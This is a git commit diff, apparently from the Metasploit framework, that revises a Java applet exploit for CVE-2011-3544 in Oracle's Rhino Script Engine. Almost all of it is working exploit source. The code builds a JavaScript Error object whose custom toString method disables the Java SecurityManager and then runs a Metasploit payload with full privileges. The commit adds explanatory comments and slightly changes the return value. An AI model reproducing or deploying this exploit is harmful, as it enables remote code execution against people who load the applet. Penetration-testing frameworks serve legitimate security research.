The more description the better

unstable
sinn3r 2011-12-01 03:03:37 -06:00
parent 93a419c76b
commit e7c179d0b5
1 changed files with 40 additions and 23 deletions

View File

@ -1,38 +1,55 @@
/*
* Oracle Java Applet Rhino Script Engine Remote Code Execution
* CVE-2011-3544
* ZDI-11-305
*
* This vulnerability is due to the way Rhino error objects are handled. Normally the script engine
* has to ensure untrusted code not being allowed to perform, but a malicious attacker can actually
* bypass this by creating an error object (which isn't checked by Rhino Script Engine), with a
* custom 'toString()' method to allow code being run with full privileges. This also allows the
* attacker to disable Java SecurityManager, and then run abitrary code.
*
* Ref:
* http://schierlm.users.sourceforge.net/CVE-2011-3544.html
*/
import java.applet.Applet;
import javax.script.*;
import javax.swing.JList;
import metasploit.Payload;
public class Exploit extends Applet {
public void init() {
try {
ScriptEngine se = new ScriptEngineManager().getEngineByName("js");
Bindings b = se.createBindings();
ScriptEngine engine = new ScriptEngineManager().getEngineByName("js");
Bindings b = engine.createBindings();
b.put("applet", this);
Object proxy = (Object) se.eval(
// Disable SecurityManager, and then run the payload
// The error object isn't handled by Rhino, so the toString method
// will not be restricted by access control
Object proxy = (Object) engine.eval(
"this.toString = function() {" +
" java.lang.System.setSecurityManager(null);" +
" applet.callBack();" +
" return 'metasploit';" +
" return String.fromCharCode(97 + Math.round(Math.random() * 25));" +
"};" +
"c = new Error();" +
"c.message = this;" +
"c", b);
JList list = new JList(new Object[] { proxy });
"e = new Error();" +
"e.message = this;" +
"e", b);
JList list = new JList(new Object[] {proxy});
this.add(list);
} catch (ScriptException ex) {
ex.printStackTrace();
}
catch (ScriptException e) {
e.printStackTrace();
}
}
public void callBack() {
try {
Payload.main(null);
} catch(Exception e) {
}
catch (Exception e) {}
}
}